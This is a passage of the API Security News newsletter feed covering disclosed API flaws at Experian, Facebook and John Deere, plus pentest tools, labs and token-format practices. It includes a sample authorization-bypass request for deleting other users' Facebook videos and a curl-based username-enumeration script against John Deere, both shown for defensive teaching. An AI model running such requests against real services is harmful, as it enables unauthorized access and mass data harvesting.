<p>In <a href="https://apisecurity.io/issue-131-api-vulnerabilities-john-deere-springfox-jwt-lab-autographql/" target="_blank" rel="noopener noreferrer">issue 131,</a> we covered how this can be done from Java Spring code. Now it&#8217;s time for .NET.</p>
<p>Edgar Silva has written a blog post on <a href="https://42crunch.com/creating-high-quality-oas-definitions-with-net-core/" target="_blank" rel="noopener noreferrer">using Swashbuckle and NSwag annotations to create high-quality OpenAPI contracts from .NET Core</a>.</p>
<p>For example:</p>
<pre>using System.ComponentModel.DataAnnotations;
using System;
 
namespace TodoApi.Models
{
 public class Person
 {
   [Required, RegularExpression("/^[a-zA-Z ]{2,100}$/"),MinLength(5),MaxLength(100)]
   public string firstName { get; set; }
   [Required, RegularExpression("/^[a-zA-Z ]{2,100}$/"),MinLength(5),MaxLength(100)]
   public string lastName { get; set; }
   [Required, Range(1, long.MaxValue)]
   public long id { get; set; }
   [Required, Range(0, 150)]
   public int age { get; set; }
 }
}</pre>
<p>If you work with .NET, <a href="https://42crunch.com/creating-high-quality-oas-definitions-with-net-core/" target="_blank" rel="noopener noreferrer">do check it out</a>!</p>
<h2>Conferences: AppSec Village at RSAC 2021</h2>
<p>As with all the industry events these days, RSA Conference 2021 (May 17—20) has had to go virtual. If you are taking this opportunity to get some great content from the comfort of your home office, check out the <a href="https://www.rsaconference.com/usa/agenda/full-agenda#q=sbx2&amp;sort=%40eventstart%20ascending" target="_blank" rel="noopener noreferrer">API security sessions of the AppSec Village track</a>.</p>
<p>This includes some great presenters, such as Erez Yalon, David Sopas, Tanya Janca, and others. A full conference pass is required.</p>
<p>The post <a href="https://apisecurity.io/issue-133-vulnerable-peloton-apis-api-contract-generation-net/">Issue 133: Vulnerable Peloton APIs, API contract generation for .NET</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 132: Experian API leak, breaches at DigitalOcean and Geico, Burp plugins, vAPI lab</title>
		<link>https://apisecurity.io/issue-132-experian-api-leak-breaches-digitalocean-geico-burp-plugins-vapi-lab/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Wed, 05 May 2021 22:00:47 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=8034</guid>

					<description><![CDATA[<p>This week, we take a look at the recent API vulnerabilities at Experian, Facebook, and possibly DigitalOcean and Geico. There is also a review of Burp plugins for API vulnerability discovery, and a new API security penetration testing lab. Vulnerability: Experian Bill Demirkapi found an unprotected Experian API that returned a credit score based simply [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-132-experian-api-leak-breaches-digitalocean-geico-burp-plugins-vapi-lab/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-132-experian-api-leak-breaches-digitalocean-geico-burp-plugins-vapi-lab/">Issue 132: Experian API leak, breaches at DigitalOcean and Geico, Burp plugins, vAPI lab</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>This week, we take a look at the recent API vulnerabilities at Experian, Facebook, and possibly DigitalOcean and Geico. There is also a review of Burp plugins for API vulnerability discovery, and a new API security penetration testing lab.</p>
<h2>Vulnerability: Experian</h2>
<p>Bill Demirkapi found <a href="https://krebsonsecurity.com/2021/04/experian-api-exposed-credit-scores-of-most-americans/" target="_blank" rel="noopener noreferrer">an unprotected Experian API that returned a credit score based simply on someone&#8217;s name and address</a>.</p>
<p>Demirkapi was shopping for a student loan and looked at the API that one of the websites was calling under the hood. The site asked for his name, address, and date of birth. However, it turned out that the date of birth was optional. Supplying all zeros instead of the actual date still produced correct results.</p>
<p>Besides the credit score, the API also returned some major risk factors explaining the score of the person in question:</p>
<p><img loading="lazy" decoding="async" class="size-full wp-image-8037 alignnone" src="https://apisecurity.io/wp-content/uploads/2021/05/FICO_score_API_vulnerability.png" alt="" width="1132" height="230" /></p>
<p>This is pretty grim. Credit agencies are not supposed to return scores based on publicly available information. Thus, a publicly available API that returns this information on tens of millions of Americans with no authentication or private data required is a big problem.</p>
<p>Experian did not provide further details, but it looks like the problem stemmed from Experian exposing an API to their partners, and one of the partners then proxying the API to their web page, with no security whatsoever. That particular instance has been fixed but it is unclear if the issue could repeat itself on another partner&#8217;s website.</p>
<p>Lessons learned:</p>
<ul>
<li>When exposing APIs to partners, ensure that <em>you</em> mandate and enforce security rules for using the API. Do not trust your partners to protect your data.</li>
<li>Assume the worst — that any such API ends up being exposed — and ensure that the API requires the parameters that <em>you</em> would require for public use and does not leak any data that is <em>not</em> supposed to be made available. Experian&#8217;s own website is a lot more restrictive in terms of this, and their APIs should definitely be at the same level.</li>
</ul>
<h2>Vulnerability: Facebook</h2>
<p>We have covered Facebook GraphQL vulnerabilities in the past. Another one just got reported and fixed. Ahmad Talahmeh found <a href="https://infosecwriteups.com/poc-remove-any-facebooks-live-video-14-000-bounty-70c8135b7b4c" target="_blank" rel="noopener noreferrer">a Broken Object-Level Authorization (BOLA) vulnerability in Facebook&#8217;s video editing API</a>.</p>
<p>Talameh was looking at the API calls that the site made when trimming or un-trimming videos. He found that an attacker could replace the parameter <code>video_id</code> with the ID of any other video and thus trim somebody else&#8217;s video:</p>
<pre class="line-numbers"><code class="language-http">POST
/api/graphql/?__a=1&amp;doc_id=3975916122480615&amp;variables{"input":
{"end_time_ms":12000,"start_time_ms":0,"video_id":"victims_video_id","actor_id":"attackers_user_id","client_mutation_id":"1"}}</code></pre>
<p>Facebook didn&#8217;t check whether or not the caller was authorized to make changes to the video (supposedly only the owner of a video was). Trimming the video all the way down to zero length made it disappear entirely, with no chance for the owner to undo this.</p>
<p>Lessons learned here:</p>
<ul>
<li><a href="https://apisecurity.io/encyclopedia/content/owasp/api1-broken-object-level-authorization" target="_blank" rel="noopener noreferrer">BOLA (aka IDOR)</a> is a serious vulnerability. Always enforce authorization and make sure that resources are accessible only to users who are supposed to access them.</li>
</ul>
<h2>Corporate breach disclosures: DigitalOcean, Geico</h2>
<p>We are lucky when vulnerabilities are reported by researchers. They typically provide lots of details on the vulnerability, making it a case from which we all can learn.</p>
<p>Unfortunately, when companies disclose their API breaches themselves, there&#8217;s not much detail. Here are just a couple of recent examples:</p>
<ul>
<li><a href="https://www.securityweek.com/digitalocean-discloses-breach-involving-billing-information" target="_blank" rel="noopener noreferrer">DigitalOcean</a>: <em>&#8220;An unauthorized user gained access to some of your billing account details through a flaw that has been fixed.&#8221;</em></li>
<li><a href="https://assets.documentcloud.org/documents/20618953/geico-data-breach-notice.pdf" target="_blank" rel="noopener noreferrer">Geico</a>: <em>&#8220;We recently determined that between January 21, 2021 and March 1, 2021, fraudsters used information about you – which they acquired elsewhere – to obtain unauthorized access to your driver’s license number through the online sales system on our website. We have reason to believe that this information could be used to fraudulently apply for unemployment benefits in your name.&#8221;</em></li>
</ul>
<p>Both disclosures look like possible API flaws, but we can only speculate whether or not this is the case and what the exact vulnerabilities were.</p>
<h2>Tools: Burp plugins</h2>
<p>Burp is a popular tool for vulnerability testing. <a href="https://blog.yeswehack.com/category/yeswerhackers/pimpmyburp/" target="_blank" rel="noopener noreferrer">In his PimpMyBurp series</a>, Adrien Jeanneau covers Burp plugins that help catch API vulnerabilities. As a teaser, here are quick descriptions of the plugins he covered in detail:</p>
<ul>
<li><strong>PwnFox</strong>: Allows you to proxy several isolated Firefox sessions into Burp, displayed in different colors. That way you can, for example, access a site using accounts with different access levels (like an administrative and a regular user account), compare the calls, and then try to use the regular user to access administrative APIs to find <a href="https://apisecurity.io/encyclopedia/content/owasp/api5-broken-function-level-authorization" target="_blank" rel="noopener noreferrer">broken function-level access (BFLA)</a> vulnerabilities.<br />
<img loading="lazy" decoding="async" class="size-full wp-image-8040 alignnone" src="https://apisecurity.io/wp-content/uploads/2021/05/firefox_tabs.png" alt="" width="936" height="136" /><br />
<img loading="lazy" decoding="async" class="alignleft size-full wp-image-8042" src="https://apisecurity.io/wp-content/uploads/2021/05/PwnFox_burp.png" alt="" width="1919" height="635" /></li>
<li><strong>Autorize</strong>: Allows you to take authentication (for example, a header or a cookie) from one account (&#8220;attacker&#8221;), apply it to calls made by another account (&#8220;victim&#8221;), and see which resources can still be accessed. If &#8220;victim&#8217;s&#8221; private resources can be accessed by the &#8220;attacker&#8221;,  we are most likely dealing with <a href="https://apisecurity.io/encyclopedia/content/owasp/api1-broken-object-level-authorization" target="_blank" rel="noopener noreferrer">BOLA</a> again:<br />
<img loading="lazy" decoding="async" class="size-full wp-image-8043 alignnone" src="https://apisecurity.io/wp-content/uploads/2021/05/autorize_burp.jpg" alt="" width="1200" height="546" /></li>
<li><strong>Auth Analyzer</strong>: Another testing tool for <a href="https://apisecurity.io/encyclopedia/content/owasp/api5-broken-function-level-authorization" target="_blank" rel="noopener noreferrer">function-level authorization</a>: &#8220;<em>Just navigate through the web application with a high privileged user and let the Auth Analyzer repeat your requests for any defined non-privileged user. With the possibility to define Parameters the Auth Analyzer is able to extract and replace parameter values automatically. With this for instance, CSRF tokens or even whole session characteristics can be auto extracted from responses and replaced in further requests. Each response will be analyzed and tagged on its bypass status.</em>&#8221;<br />
<img loading="lazy" decoding="async" class="size-full wp-image-8044 alignnone" src="https://apisecurity.io/wp-content/uploads/2021/05/Auth-Analyzer.jpg" alt="" width="1200" height="587" /></li>
<li><strong>AutoRepeater</strong>: A powerful tool to change/add/remove on the fly any parts of API calls. It also adds conditional highlighting and filtering to the logs, making result analysis easier.</li>
</ul>
<h2>Pentesting Lab: vAPI</h2>
<p><a href="https://github.com/roottusk/vapi" target="_blank" rel="noopener noreferrer">vAPI (Vulnerable Adversely Programmed Interface)</a> is an open-source PHP-based lab by Tushar Kulkarni that you can use to see OWASP API Security Top 10 vulnerabilities in action.</p>
<p>You can set it up yourself, or use a Docker image. There is also a Postman collection file documenting the API calls.</p>
<p>A good resource for your API security exercises.</p>
<p>The post <a href="https://apisecurity.io/issue-132-experian-api-leak-breaches-digitalocean-geico-burp-plugins-vapi-lab/">Issue 132: Experian API leak, breaches at DigitalOcean and Geico, Burp plugins, vAPI lab</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 131: API vulnerabilities at John Deere, Springfox, JWT lab, AutoGraphQL</title>
		<link>https://apisecurity.io/issue-131-api-vulnerabilities-john-deere-springfox-jwt-lab-autographql/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Wed, 28 Apr 2021 22:00:13 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=8010</guid>

					<description><![CDATA[<p>This week, we check out the recent API vulnerability in John Deere farming machinery, the best practices in using Springfox annotations for API security, a new JWT penetration testing lab, and AutoGraphQL  &#8211; a tool for GraphQL authorization testing. Vulnerability: John Deere John Deere is one of the leading manufacturers of expensive farming equipment, such [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-131-api-vulnerabilities-john-deere-springfox-jwt-lab-autographql/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-131-api-vulnerabilities-john-deere-springfox-jwt-lab-autographql/">Issue 131: API vulnerabilities at John Deere, Springfox, JWT lab, AutoGraphQL</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>This week, we check out the recent API vulnerability in John Deere farming machinery, the best practices in using Springfox annotations for API security, a new JWT penetration testing lab, and AutoGraphQL  &#8211; a tool for GraphQL authorization testing.</p>
<h2>Vulnerability: John Deere</h2>
<p>John Deere is one of the leading manufacturers of expensive farming equipment, such as tractors and combine harvesters. Many of these are automated to the highest degree and cost millions of dollars.</p>
<p><a href="https://sick.codes/leaky-john-deere-apis-serious-food-supply-chain-vulnerabilities-discovered-by-sick-codes-kevin-kenney-willie-cade/" target="_blank" rel="noopener noreferrer">Researchers found a few vulnerabilities</a> in the APIs behind the web and mobile applications for the machinery. John Deere has since fixed the found vulnerabilities.</p>
<p>The first vulnerability allowed attackers to look up usernames. The researchers found that as they were creating the username in the John Deere Account Portal, the interface kept making API calls to check if the username existed. There seemed to be no authentication and no rate-limiting in place. A quick script iterating the names of Fortune 1000 companies found 192 company usernames in the system:</p>
<pre class="line-numbers"><code class="language-http">while IFS=, read -r COMPANY JUNK; do
    TRIMMED_COMPANY="$(tr -dc "[:alnum:]" &lt;&lt;&lt; "${COMPANY}")"
    echo "${TRIMMED_COMPANY}"
    USERNAME="${TRIMMED_COMPANY}"
    RESPONSE="$(curl '<span>https</span>:// myjohndeere. deere. <span>com</span>/wps/PA_myjd_live/struts/validateUserName' -H 'User-Agent: Mozilla/5.0 (X11;
Linux i686; rv:60.0) Gecko/20100101 Firefox/60.0' -H 'Accept: application/json, text/javascript, */*; q=0.01' -H 'Accept-Language: 
en-US,en;q=0.5' --compressed -H 'Content-Type: application/x-www-form-urlencoded' -H 'X-Requested-With: XMLHttpRequest' -H 'Origin:
<span>https:/</span>/ myjohndeere. deere<span>. com</span>' -H 'DNT: 1' -H 'Connection: keep-alive' -H 'Sec-GPC: 1' -H 'Pragma: no-cache' -H 'Cache-Control: 
no-cache' --data-raw "userName=${USERNAME}")"
    echo "${USERNAME}"$'\t'"${RESPONSE}" &gt;&gt; results.tsv
done &lt; Fortune1000.csv</code></pre>
<p>The second vulnerability was in the APIs behind John Deere Operations Center. The researchers could easily enroll for a developer account and get access to the portal. They looked at the API call for adding new equipment to the operations center and found out that the API responded with a whopping 5,800-character-long JSON.</p>
<p><img loading="lazy" decoding="async" class=" wp-image-8014 alignnone" src="https://apisecurity.io/wp-content/uploads/2021/04/John-Deere-VIN-API-1.png" alt="" width="382" height="161" /></p>
<p>The JSON contained lots of information about the equipment, including the owner’s name, physical address, equipment GUID, terminal remote access availability, and so on. The information was returned for any equipment regardless of the owner (and, interestingly, even the manufacturer if a non-Deere VIN was provided).</p>
<p>This is effectively a combination of:</p>
<ul>
<li><a href="https://apisecurity.io/encyclopedia/content/owasp/api1-broken-object-level-authorization" target="_blank" rel="noopener noreferrer">OWASP API1:2019 — Broken object-level authorization (BOLA)</a>: Lack of authorization enforcement to ensure that only authorized users get access to their resources.</li>
<li><a href="https://apisecurity.io/encyclopedia/content/owasp/api3-excessive-data-exposure" target="_blank" rel="noopener noreferrer">OWASP API3:2019 — Excessive data exposure</a>: Clearly, in this particular business scenario, all that sensitive and PII data was not even necessary, just leaking without any purpose.</li>
</ul>
<p>It&#8217;s also worth noting that even with significant software and API use in their machines, at the time, John Deere seemed to be lacking a clearly defined process for reporting vulnerabilities and bugs in a safe and secure way, as attested by the complaints on the issue in our researchers&#8217; report.</p>
<p>Lessons learned here:</p>
<ul>
<li>Authentication is not enough. You need to also implement authorization checks for any resource access in your APIs. Rate limiting and other protections against enumeration and scripted attacks rarely go amiss, either.</li>
<li>Beware of your API responses. For any API, consider the actual use-case, the bare minimum of the information that you need from the API, and the risks of the data getting retrieved by malicious actors.</li>
<li>If software, web services, or APIs play any significant part in your products — especially if data classified as PII or sensitive is involved — do set up and clearly document a process how bugs — especially security bugs — can be safely reported.</li>
</ul>
<h2>Best Practices: Springfox annotations and OpenAPI</h2>
<p><a href="https://spring.io/" target="_blank" rel="noopener noreferrer">Spring</a> is a popular framework in the world of Java development, especially for micro-services and thus API development. Spring uses annotations to programmatically mark chains of dependencies and define the behavior of the Spring framework.</p>
<p>And, even better, Spring annotations can actually make your APIs a lot more secure. I.e., they can automate generating machine and human-readable API definitions in JSON from Spring projects:</p>
<ul>
<li><a href="https://springfox.github.io/springfox/docs/current/" target="_blank" rel="noopener noreferrer">Springfox</a> for generating API definitions that follow the OpenAPI Specification (OAS) v2</li>
<li><a href="https://springdoc.org/" target="_blank" rel="noopener noreferrer">Springdoc</a> for generating API definitions that follow the OAS v3</li>
</ul>
<p>These annotations not only document the APIs, thus enable testing their security and behavior and protecting them, they also enable some automated data validation from Spring. Thus, adding the annotations to your Spring projects is time well spent.</p>
<p>Isabelle Mauny and Edgar Silva from 42Crunch have published a two-part blog post on this scenario:</p>
<ul>
<li><a href="https://42crunch.com/springfox-guide-security-definitions" target="_blank" rel="noopener noreferrer">Creating High-Quality OAS Definitions with Springfox – Part 1: Security Definitions</a></li>
<li><a href="https://42crunch.com/creating-high-quality-oas-definitions-with-springfox-part-2-data-validation" target="_blank" rel="noopener noreferrer">Creating High-Quality OAS Definitions with Springfox – Part 2: Data Validation</a></li>
</ul>
<p>If you work with Spring, definitely worth checking out.</p>
<h2>Pentesting: JWT hacking challenges</h2>
<p>JWT (JSON Web Token) vulnerabilities and attacks are a common topic in this newsletter. They are critical because JWT serves as the foundation for authentication in many modern OAuth and OpenID Connect APIs.</p>
<p>Ricardo J. Uviedo Garrido has created <a href="https://github.com/onsecru/jwt-hacking-challenges" target="_blank" rel="noopener noreferrer">an open-source lab</a> that you can use to see some of these vulnerabilities in action. The lab includes the following JWT signature attacks:</p>
<ul>
<li>none</li>
<li>weak secret key</li>
<li>key confusion</li>
<li>key injection</li>
<li>JWKS spoofing</li>
<li>kid</li>
</ul>
<h2>Tools: AutoGraphQL</h2>
<p><a href="https://graphql-dashboard.herokuapp.com/" target="_blank" rel="noopener noreferrer">AutoGraphQL</a> by Ron Chan makes it easier to test GraphQL APIs for authorization vulnerabilities. AutoGraphQL can detect both <a href="https://apisecurity.io/encyclopedia/content/owasp/api1-broken-object-level-authorization" target="_blank" rel="noopener noreferrer">Broken Object-Level Authorization</a> and <a href="https://apisecurity.io/encyclopedia/content/owasp/api5-broken-function-level-authorization" target="_blank" rel="noopener noreferrer">Broken Function-Level Authorization</a>, making it very useful as these are high on the OWASP API Security Top 10 list.</p>
<p>The process is quite straightforward:</p>
<ol>
<li>Read the introspection file.</li>
<li>Pick the API calls that you want to test.</li>
<li>Set user accounts to be used in the tests.</li>
<li>Run the tool and check which calls succeeded and which failed, then see if these authorization tests were in line with what you expected.</li>
</ol>
<p>Check out this video of the tool in action:</p>
<p><iframe loading="lazy" title="Include This In Your Hacking Workflow by Continuous Monitoring with AuthoGraphQL (How-to guide)" width="640" height="360" src="https://www.youtube.com/embed/JJmufWfVvyU?feature=oembed" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share" referrerpolicy="strict-origin-when-cross-origin" allowfullscreen></iframe></p>
<p>The post <a href="https://apisecurity.io/issue-131-api-vulnerabilities-john-deere-springfox-jwt-lab-autographql/">Issue 131: API vulnerabilities at John Deere, Springfox, JWT lab, AutoGraphQL</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 130: GitHub&#8217;s new token format, MindAPI, Kiterunner</title>
		<link>https://apisecurity.io/issue-130-githubs-new-token-format-mindapi-kiterunner/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Wed, 21 Apr 2021 22:00:10 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=7973</guid>

					<description><![CDATA[<p>It&#8217;s a rare week with no high-profile API breaches in the news, so we can actually take our time to focus on the positives, like the best practices around API tokens and new tools for API reconnaissance and penetration testing. Best practices: API token format API keys can be or look like pretty much anything. [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-130-githubs-new-token-format-mindapi-kiterunner/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-130-githubs-new-token-format-mindapi-kiterunner/">Issue 130: GitHub&#8217;s new token format, MindAPI, Kiterunner</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>It&#8217;s a rare week with no high-profile API breaches in the news, so we can actually take our time to focus on the positives, like the best practices around API tokens and new tools for API reconnaissance and penetration testing.</p>
<h2>Best practices: API token format</h2>
<p>API keys can be or look like pretty much anything. And like any other means of authentication, they are very sensitive if they leak out and fall into the wrong hands.</p>
<p>Designing API tokens that follow unique patterns is one of the security best practices gaining traction lately. This enables tools that can detect these API keys, for example, in code repositories or logs, and can thus prevent leaks.</p>
<p>In our <a href="https://apisecurity.io/issue-109-api-token-best-practices-dredd-idor-hunting-tips/" target="_blank" rel="noopener noreferrer">issue 109</a>, we covered the approach that Dynatrace took with their tokens. Now, <a href="https://github.blog/2021-04-05-behind-githubs-new-authentication-token-formats/" target="_blank" rel="noopener noreferrer">GitHub has published a blog post on the changes to the token format on their side</a>:</p>
<ol>
<li>Unique prefix clearly separated by an underscore: All tokens now start with three letters, <code>gh</code> for &#8220;GitHub&#8221; and the 3rd letter to identify the kind of token:
<ul>
<li><code>ghp_</code> for GitHub <strong><u>p</u></strong>ersonal access tokens</li>
<li><code>gho_</code> for <strong><u>O</u></strong>Auth access tokens</li>
<li><code>ghu_</code> for GitHub <strong><u>u</u></strong>ser-to-server tokens</li>
<li><code>ghs_</code> for GitHub <strong><u>s</u></strong>erver-to-server tokens</li>
<li><code>ghr_</code> for <strong><u>r</u></strong>efresh tokens</li>
</ul>
</li>
<li>Increased entropy in the random section of the token string</li>
<li>Checksum characters to separate false positive hits from actual tokens</li>
</ol>
<p>This format allows easily to locate tokens with <code>grep</code> and other tools, with reliable results and not too much additional noise.</p>
<h2>Penetration testing: API mindmap</h2>
<p>Mindmaps can be a great way to visually organize information, especially when it comes to large concepts, and API security is no different here.</p>
<p><a href="https://github.com/dsopas/MindAPI" target="_blank" rel="noopener noreferrer">David Sopas has put together a project, MindAPI, to bring &#8220;order to API hacking chaos</a>.&#8221; The project collects best practices, tips and tricks, and tools for:</p>
<ul>
<li>API reconnaissance: how to discover undocumented APIs</li>
<li>Vulnerability testing for each of the risks on the OWASP API Security Top 10 list</li>
</ul>
<p>To make this big bundle of information easier to approach, Sopas has put together <a href="https://dsopas.github.io/MindAPI/play/" target="_blank" rel="noopener noreferrer">an interactive mindmap</a> that shows how things go together.</p>
<p><a href="https://dsopas.github.io/MindAPI/play/"><img loading="lazy" decoding="async" class=" wp-image-8004 alignnone" src="https://apisecurity.io/wp-content/uploads/2021/04/MindAPI_preview.jpg" alt="" width="220" height="279" /></a></p>
<p>And if you got interested, you can also contribute to the project.</p>
<h2>Penetration testing: GraphQL</h2>
<p>GraphQL is still small fry in the world of APIs, but it continues to pique pentesters&#8217; interest. Which is no wonder considering that Facebook heavily relies on GraphQL implementation, and quite a few other companies are also starting to expose GraphQL endpoints.</p>
<p>If you need an introduction to GraphQL penetration testing, check out <a href="https://blog.yeswehack.com/yeswerhackers/how-exploit-graphql-endpoint-bug-bounty/" target="_blank" rel="noopener noreferrer">this recent blog post by YesWeHack</a>. They cover:</p>
<ul>
<li>Introspection</li>
<li>Fuzzing (when introspection is off)</li>
<li>Query flaws</li>
<li>Mutation flaws</li>
<li>SQL injections</li>
<li>Debug information</li>
<li>Batching attacks</li>
<li>Tools
<ul>
<li>GraphQL Voyager</li>
<li>InQL</li>
</ul>
</li>
</ul>
<p>We have previously featured GraphQL pentesting and resources in our issues <a href="https://apisecurity.io/issue-125/" target="_blank" rel="noopener noreferrer">125</a>, <a href="https://apisecurity.io/issue-121-vulnerability-chess-com-graphql-security-playground-checklist/" target="_blank" rel="noopener noreferrer">121</a>, <a href="https://apisecurity.io/issue-116-facebook-parler-api-vulnerabilities-clairvoyance/" target="_blank" rel="noopener noreferrer">116</a>, <a href="https://apisecurity.io/issue-114-solarwinds-pickpoint-breaches-github-code-scanning-review-graphql-security/" target="_blank" rel="noopener noreferrer">114</a>, <a href="https://apisecurity.io/issue-96-vulnerabilities-cisco-mgm-grand-casino-tutorial-chrome-devtools-pentesting-graphql/" target="_blank" rel="noopener noreferrer">96</a>, and <a href="https://apisecurity.io/issue-82-common-graphql-vulnerabilities-pentesting-insomnia/" target="_blank" rel="noopener noreferrer">82</a>.</p>
<h2>Tools: Kiterunner</h2>
<p>Speaking of API reconnaissance, Kiterunner is a new tool for it that is worth checking out.</p>
<p>Traditionally, API recon is done simply by using large dictionary files of possible paths and path parameters and iterating through them.</p>
<p>Shubham Shah decided to optimize this process. He noticed that many APIs get generated by frameworks, such as Flask, Rails, and Express, rather than designed from scratch by humans. Since frameworks are not exactly random in the way they work, he decided to build a recon model based on a large sample of API contracts.</p>
<p>Shah collected about 67,500 OpenAPI files available on the internet, like in APIs.guru and GitHub, and used them to pull together a model for framework-generated APIs. For more details on the research process, see <a href="https://blog.assetnote.io/2021/04/05/contextual-content-discovery/" target="_blank" rel="noopener noreferrer">his detailed blog post</a>.</p>
<p>Kiterunner is an open-source tool. You can <a href="https://github.com/assetnote/kiterunner" target="_blank" rel="noopener noreferrer">check out its repo here</a>.</p>
<p>And if you want to see a demo, here&#8217;s a video on it by Katie Paxton-Fear:</p>
<p><iframe loading="lazy" title="API Recon with Kiterunner - Hacker Toolbox" width="640" height="360" src="https://www.youtube.com/embed/hNs8fpWfcyU?feature=oembed" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share" referrerpolicy="strict-origin-when-cross-origin" allowfullscreen></iframe></p>
<p>The post <a href="https://apisecurity.io/issue-130-githubs-new-token-format-mindapi-kiterunner/">Issue 130: GitHub&#8217;s new token format, MindAPI, Kiterunner</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 129: Facebook and Clubhouse profiles scraped through APIs, Forrester&#8217;s &#8220;State of Application Security, 2021&#8221;</title>
		<link>https://apisecurity.io/issue-129-facebook-clubhouse-profiles-scraped-apis-forresters-state-application-security-2021/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Wed, 14 Apr 2021 22:00:54 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=7940</guid>

					<description><![CDATA[<p>This week, we obviously have to discuss the hundreds of millions of Facebook and Clubhouse user profiles that were scraped using APIs. In other news, Forrester has published their fresh and insightful report &#8220;The State of Application Security&#8221;, and there&#8217;s a new online training &#8220;Building an Identity Architecture for APIs&#8221;. Data leak: Facebook The biggest [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-129-facebook-clubhouse-profiles-scraped-apis-forresters-state-application-security-2021/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-129-facebook-clubhouse-profiles-scraped-apis-forresters-state-application-security-2021/">Issue 129: Facebook and Clubhouse profiles scraped through APIs, Forrester&#8217;s &#8220;State of Application Security, 2021&#8221;</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>This week, we obviously have to discuss the hundreds of millions of Facebook and Clubhouse user profiles that were scraped using APIs. In other news, Forrester has published their fresh and insightful report &#8220;The State of Application Security&#8221;, and there&#8217;s a new online training &#8220;Building an Identity Architecture for APIs&#8221;.</p>
<h2>Data leak: Facebook</h2>
<p>The biggest recent data leak news is the huge database of 530 million Facebook users that was made available. <a href="https://about.fb.com/news/2021/04/facts-on-news-reports-about-facebook-data/" target="_blank" rel="noopener noreferrer">Facebook has made an official statement</a> on the incident, downplaying it because the data was &#8220;scraped&#8221; already back in 2019 using Facebook&#8217;s APIs, rather than obtained through some sort of database access or another &#8220;direct&#8221; hack.</p>
<p>The vulnerability that attackers exploited was in the API that Facebook created for discovering friends based on the contacts in your phone. Facebook wanted to make it easy for users to find their friends on the social network, so the Facebook app used an API to upload the contacts from users&#8217; phones to Facebook and fetch the profiles of users matching the uploaded phone numbers.</p>
<p>Sounds nice and user-friendly, but as so often happens, making things easy can also make them less secure. Attackers took advantage of the feature by generating huge &#8220;phone books&#8221; and submitting them to the API. After all, phone numbers are just a sequence of numbers following a set syntax: country code, area code, and a seven-digit number. Thus, iterating through them is not difficult.</p>
<p>This allowed scraping the user database and collecting a huge dataset of personal details, definitely something that should not have happened and should probably have been foreseen. After all, attackers are a very resourceful bunch. Now, with the publication of the scraped dataset, the information on names, Facebook IDs, phone numbers, and email addresses of 530 million users (including Mark Zuckerberg himself) has ended up in the public realm.</p>
<p>Naturally, with a high-profile case like this, a lot of researchers have been looking into the details. For example, check out <a href="https://twitter.com/ashk4n/status/1379190936970829825" target="_blank" rel="noopener noreferrer">this thread by Ashkan Soltani</a>.</p>
<p>Let&#8217;s try to summarize the impact:</p>
<ul>
<li>Facebook&#8217;s stance that if API was used to collect the data, it is not a hack makes little sense. APIs are just another attack vector — and in fact one of the main attack vectors these days — used by malicious actors. A hack is a hack, regardless of the attack vector employed.</li>
<li>Even though some of the data is public (like names), such large datasets of this public information combined with other details can be used for various phishing and social engineering attacks. There have been reports on other datasets that also include users&#8217; page likes. This aggravates the situation considerably: the more details scammers have readily at their disposal, the more convincing the scams.</li>
<li>The phone number matching worked <em>regardless</em> of the user&#8217;s privacy setting. Even if the phone number was set not to be shared, or even if it was only used for multi-factor authentication, the API still exposed the user profile for the phone number. This is a huge violation of user privacy and trust!</li>
<li>Reports indicate that Facebook had been receiving reports on the vulnerability <em>for years</em> before finally fixing the vulnerability in 2019!</li>
</ul>
<p>Look at it whichever way you want, Facebook is definitely not appearing in a good light here.</p>
<p>Lessons learned from this bad example:</p>
<ul>
<li>APIs are one of your primary attack surfaces. Treat them as such!</li>
<li>Even public information can become dangerous once it becomes available as a large dataset. Information is power, after all: more information, more power. It should not be allowed to fall into wrong hands through negligence.</li>
<li>APIs should not give access to more data than you are comfortable with (and allowed to!) sharing through user interfaces.</li>
<li>Bulk operations are extremely dangerous. Always limit not just the rates at which APIs can be invoked <em>but also the amount of data that they can return</em>.</li>
